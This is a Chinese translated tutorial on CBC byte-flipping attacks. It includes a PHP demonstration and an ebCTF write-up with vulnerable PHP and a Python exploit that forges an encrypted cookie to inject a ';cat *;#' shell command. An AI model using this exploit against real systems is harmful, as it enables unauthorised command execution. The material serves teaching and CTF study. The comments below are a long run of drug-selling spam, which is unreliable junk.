CBC字节翻转攻击-101Approach

0x00 译者前言

本文翻译自:http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/

drops里的相关主题文章:使用CBC比特反转攻击绕过加密的会话令牌
缘起是糖果出的一道题,看到原文作者对这一问题阐述的较为详细,虽然时间有些久远,但翻译一下可与诸君学习一下思考问题的方法。

0x01 相关介绍

此攻击方法的精髓在于:通过损坏密文字节来改变明文字节。(注:借助CBC内部的模式)借由此可以绕过过滤器,或者改变用户权限提升至管理员,又或者改变应用程序预期明文以尽猥琐之事。

首先让我们看看CBC是如何工作的,(作者很懒所以)更多细节你可以看这里:wiki
在这里只是解释一下关于攻击必须要理解的部分。(即:一图胜千言)

加密过程
CBC字节翻转攻击-101Approach
Plaintext:待加密的数据。

IV:用于随机化加密的比特块,保证即使对相同明文多次加密,也可以得到不同的密文。

Key:被一些如AES的对称加密算法使用。

Ciphertext:加密后的数据。

在这里重要的一点是,CBC工作于一个固定长度的比特组,将其称之为块。在本文中,我们将使用包含16字节的块。

因为作者讨厌高数(和译者一样),所以作者造了一些自己的公式(方便记忆):
•Ciphertext-0 = Encrypt(Plaintext XOR IV)—只用于第一个组块
•Ciphertext-N= Encrypt(Plaintext XOR Ciphertext-N-1)—用于第二及剩下的组块

注意:正如你所见,前一块的密文用来产生后一块的密文。

Decryption Process
CBC字节翻转攻击-101Approach

•Plaintext-0 = Decrypt(Ciphertext) XOR IV—只用于第一个组块
•Plaintext-N= Decrypt(Ciphertext) XOR Ciphertext-N-1—用于第二及剩下的组块

注意:Ciphertext-N-1(密文-N-1)是用来产生下一块明文;这就是字节翻转攻击开始发挥作用的地方。如果我们改变Ciphertext-N-1(密文-N-1)的一个字节,然后与下一个解密后的组块异或,我们就可以得到一个不同的明文了!You got it?别担心,下面我们将看到一个详细的例子。与此同时,下面的这张图也可以很好地说明这种攻击:
CBC字节翻转攻击-101Approach

0x02 一个例子(CBC Blocks of 16 bytes)

比方说,我们有这样的明文序列:

a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo 'Hello sdsdsd!'";}

我们的目标是将“s:6”当中的数字6转换成数字“7”。我们需要做的第一件事就是把明文分成16个字节的块:
•Block 1:a:2:{s:4:"name"; •Block 2:s:6:"sdsdsd";s:8 •Block 3::"greeting";s:20 •Block 4::"echo 'Hello sd •Block 5:sdsd!'";} 因此,我们的目标字符位于块2,这意味着我们需要改变块1的密文来改变第二块的明文。

有一条经验法则是(注:结合上面的说明图可以得到),你在密文中改变的字节,只会影响到在下一明文当中,具有相同偏移量的字节。所以我们目标的偏移量是2:
•[0] = s
•1 = :
•2 =6

因此我们要改变在第一个密文块当中,偏移量是2的字节。正如你在下面的代码当中看到的,在第2行我们得到了整个数据的密文,然后在第3行中,我们改变块1中偏移量为2的字节,最后我们再调用解密函数。
1.$v = "a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo 'Hello sdsdsd!'";}";
2.$enc = @encrypt($v);
3.$enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord ("7"));
4.$b = @decrypt($enc);

运行这段代码后,我们可以将数字6变为7:
CBC字节翻转攻击-101Approach
但是我们在第3行中,是如何改变字节成为我们想要的值呢?

基于上述的解密过程,我们知道有,A = Decrypt(Ciphertext)与B = Ciphertext-N-1异或后最终得到C = 6。等价于:
A = B XOR C
最后,A XOR B XOR C等于0。有了这个公式,我们可以在XOR运算的末尾处设置我们自己的值,就像这样:

A XOR B XOR C XOR "7"会在块2的明文当中,偏移量为2的字节处得到7。

下面是相关原理实现的PHP源代码:

define('MY_AES_KEY', "abcdef0123456789"); function aes($data, $encrypt) { $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, ''); $iv = "1234567891234567"; mcrypt_generic_init($aes, MY_AES_KEY, $iv); return $encrypt ? mcrypt_generic($aes,$data) : mdecrypt_generic($aes,$data); } define('MY_MAC_LEN', 40); function encrypt($data) { return aes($data, true); } function decrypt($data) { $data = rtrim(aes($data, false), "\0"); return $data; } $v = "a:2:{s:4:\"name\";s:6:\"sdsdsd\";s:8:\"greeting\";s:20:\"echo 'Hello sdsdsd!'\";}"; echo "Plaintext before attack: $v\n"; $b = array(); $enc = array(); $enc = @encrypt($v); $enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord ("7")); $b = @decrypt($enc); echo "Plaintext AFTER attack : $b\n";
0x03 一个练习

光说不练假把式,接下来作者举了一个他参加过的CTF中的一道题目的例子(更多详情可以参阅最后的相关参考链接),然后阐述了他是怎样在最后几步中打破CBC的。

下面提供了这个练习当中很重要的一部分源码:
CBC字节翻转攻击-101Approach

name = 'X' + ';cat *;#a'

首先作者添加了一个字符"X",通过CBC翻转攻击将其替换成一个单引号,然后;cat *;命令将被执行,最后的#是用来注释,确保函数escapeshellarg()插入的单引号不会引起其他问题;因此我们的命令就被成功执行啦。

在计算好之前的密码块中,要被改变的字节的确切偏移量(51)后,作者通过下面的代码来注入单引号:

pos = 51; val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos])) exploit = cookie[0:pos] + val + cookie[pos + 1:]

然后作者通过改变cookie(因为其具有全部的密文),得到以下结果:
CBC字节翻转攻击-101Approach
首先,因为我们改变了第一块,所以在第二块中,黄色标记的"X"被成功替换为单引号,它被认为是多余插入(绿色),导致在unserialize()处理数据时产生一个错误(红色),因此应用程序甚至都没有去尝试执行注入了。

如何完善

我们需要使我们的注入数据有效,那么我们在第一块中得到的额外数据,就不能在反序列化的过程中造成任何问题(unserialize())。一种方法是在我们的恶意命令中填充字母字符。因此我们尝试在注入字符串前后填充多个'z':

name = 'z'*17 + 'X' + ';cat *;#' + 'z'*16

在发送上述字符串后,unserialize()并没有报错,并且我们的shell命令成功执行!!!

0x04 相关参考

1.CRYPTO #2: http://blog.gdssecurity.com/labs/tag/crypto
2.http://codezen.fr/2013/08/05/ebctf-2013-web400-cryptoaescbchmac-write-up/
3.http://hardc0de.ru/2013/08/04/ebctf-web400/

0x05 附录代码

下面是上面练习当中的PHP源码及exp:

•PHP code:
ini_set('display_errors',1); error_reporting(E_ALL); define('MY_AES_KEY', "abcdef0123456789"); define('MY_HMAC_KEY',"1234567890123456" ); #define("FLAG","CENSORED"); function aes($data, $encrypt) { $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, ''); $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($aes), MCRYPT_RAND); $iv = "1234567891234567"; mcrypt_generic_init($aes, MY_AES_KEY, $iv); return $encrypt ? mcrypt_generic($aes, $data) : mdecrypt_generic($aes, $data); } define('MY_MAC_LEN', 40); function hmac($data) { return hash_hmac('sha1', data, MY_HMAC_KEY); } function encrypt($data) { return aes($data . hmac($data), true); } function decrypt($data) { $data = rtrim(aes($data, false), "\0"); $mac = substr($data, -MY_MAC_LEN); $data = substr($data, 0, -MY_MAC_LEN); return hmac($data) === $mac ? $data : null; } $settings = array(); if (@$_COOKIE['settings']) { echo @decrypt(base64_decode($_COOKIE['settings'])); $settings = unserialize(@decrypt(base64_decode($_COOKIE['settings']))); } if (@$_POST['name'] && is_string($_POST['name']) && strlen($_POST['name']) < 200) { $settings = array( 'name' => $_POST['name'], 'greeting' => ('echo ' . escapeshellarg("Hello {$_POST['name']}!")), ); setcookie('settings', base64_encode(@encrypt(serialize($settings)))); #setcookie('settings', serialize($settings)); } $d = array(); if (@$settings['greeting']) { passthru($settings['greeting']); else { echo "

\n";
echo "
What is your name?

\n";
echo "\n";
echo "\n";
echo "

 \n"; } ?> 
Exploit:
#!/usr/bin/python import requests import sys import urllib from base64 import b64decode as dec from base64 import b64encode as enc url = 'http://192.168.184.133/ebctf/mine.php' def Test(x): t = "echo 'Hello %s!'" % x s = 'a:2:{s:4:"name";s:%s:"%s";s:8:"greeting";s:%s:"%s";}%s' % (len(x),x,len(t),t, 'X'*40) for i in xrange(0,len(s),16): print s[i:i+16] print '\n' def Pwn(s): global url s = urllib.quote_plus(enc(s)) req = requests.get(url, cookies = {'settings' : s}).content # if req.find('works') != -1: print req # else: # print '[-] FAIL' def GetCookie(name): global url d = { 'name':name, 'submit':'Submit' } h = requests.post(url, data = d, headers = {'Content-Type' : 'application/x-www-form-urlencoded'}).headers if h.has_key('set-cookie'): h = dec(urllib.unquote_plus(h['set-cookie'][9:])) #h = urllib.unquote_plus(h['set-cookie'][9:]) #print h return h else: print '[-] ERROR' sys.exit(0) #a:2:{s:4:"name";s:10:"X;cat *;#a";s:8:"greeting";s:24:"echo 'Hello X;cat *;#a!'";} #a:2:{s:4:"name"; #s:10:"X;cat *;#a #";s:8:"greeting" #;s:24:"echo 'Hel #lo X;cat *;#a!'" #;} #a:2:{s:4:"name";s:42:"zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz";s:8:"greeting";s:56:"echo 'Hello zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz!'";} #a:2:{s:4:"name"; #s:42:"zzzzzzzzzz #zzzzzzzX;cat *;# #zzzzzzzzzzzzzzzz #";s:8:"greeting" #;s:56:"echo 'Hel #lo zzzzzzzzzzzzz #zzzzX;cat *;#zzz #zzzzzzzzzzzzz!'" #;} #exploit = 'X' + ';cat *;#a' #Test case first, unsuccess exploit = 'z'*17 + 'X' + ';cat *;#' + 'z' *16 # Test Success #exploit = "______________________________________________________; cat *;#" #Test(exploit) cookie = GetCookie(exploit) pos = 100; #test case success #pos = 51; #test case first, unsuccess val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos])) exploit = cookie[0:pos] + val + cookie[pos + 1:] Pwn(exploit)

评论区

评论一下~


18+40=?

已有 77 条评论

Alfonzo
读者

I'm doing an internship altacef 500mg dosage The investment, the first municipal bond issuance in West Africa, will also enable Dakar to collect tax revenues.

Warner
读者

How do I get an outside line? trazodone sleep The warning comes ahead of AMD Awareness Week 2014, which runs from September 15-21

Barrett
读者

We were at school together robaxin 500mg online “But I didn't know the city or town's name, and finding a small neighborhood in a vast country proved to be nearly impossible."

Britt
读者

Directory enquiries prednisone for sale Of course, since we are viewing this from such a great distance we don't see the stars individually, we see a glowing haze made by billions of stars," said experimental cosmologist Jamie Bock of NASA's Jet Propulsion Laboratory and the California Institute of Technology.

Merle
读者

Could I have an application form? phenergan online australia Futures pointed to a lower open on Wall Street, however, with investors concerned that the recent strength of the U.S

Elvis
读者

Pleased to meet you cheap zofran NOTES: The Cowboys are 2-1 for the fourth straight season and have won 12 in a row in Week 3

Wallace
读者

Thanks for calling tamsulosin and dutasteride They searched medical databases for all evidence relating to this topic that was published between 1967 and 2013

George
读者

How would you like the money? vermox 100mg/5ml oral suspension mebendazole However, if urticaria is present a lot and is not related to allergens, this is considered CSU.

Jarvis
读者

I'm from England antabuse medication cost The bank itself gained 0.9 percent after its fourth-quarterprofit rose 64.1 percent to 850 million dirhams ($231.4million), according to Reuters calculations

Benjamin
读者

Three years olanzapine im maximum dose For example, the lowest-priced Huggies Snug & Dry 44-packfor a size 1 newborn baby costs $8.97, while P&G's 48-pack Luvsfor the same size sells for $6.99, according to Wal-Mart StoresInc's website.

Rashad
读者

What sort of work do you do? order zyloprim A decadal sample identified as the North Pacific Method, a pattern of larger-than-common sea-surface area temperatures that snakes from the tropical Pacific to the waters off coastal California to the northern Pacific, brought on the unusual temperature

Corey
读者

Very interesting tale how to buy zenegra in uk A stronger franc also makes the country, which features some of the world's finest ski slopes, more expensive to visit

Kendrick
读者

Where do you come from? 4mg tizanidine effects While stayed, Thursday's federal court ruling applies more broadly than previous rulings in state courts with limited jurisdiction in several south Florida counties, said Stephen Rosenthal, lead attorney in the case involving the American Civil Liberties Union of Florida and SAVE, a gay-rights organization in South Florida.

Edmond
读者

I'm only getting an answering machine enalapril cheap Under the proposals, migrants would have the right to public health care but the cost would be covered by their home state with any shortfall made up through private health insurance, while children of EU citizens would have a right to access childcare and primary and secondary education.

Chang
读者

I've lost my bank card generic tricor State-backed RBS and Lloyds scraped through the test after both took pre-emptive measures toshore up their capital defences.

Alphonse
读者

Yes, I play the guitar buy carbamazepine online They will later be moved to the 60-day DL when the Mets need to make room on the 40-man roster.

Cortez
读者

I've got a very weak signal order sporanox “They move the ball and they move bodies and that’s what I like doing

Caleb
读者

A First Class stamp where to buy sinequan She had shelved plans for a trip in 2013, following a row over US spying on the Brazilian government.

Gustavo
读者

A First Class stamp buying clomiphene online uk In Washington, Defense Secretary Chuck Hagel told US lawmakers that plans were being laid to hit targets in Syria, where the IS group is holding Western hostages and has a stronghold in the city of Raqa.

Gilbert
读者

I've got a very weak signal buy revia So using the latest and greatest computer security technologies to create wallets that people can…think of wallets as banks, effectively

回到顶部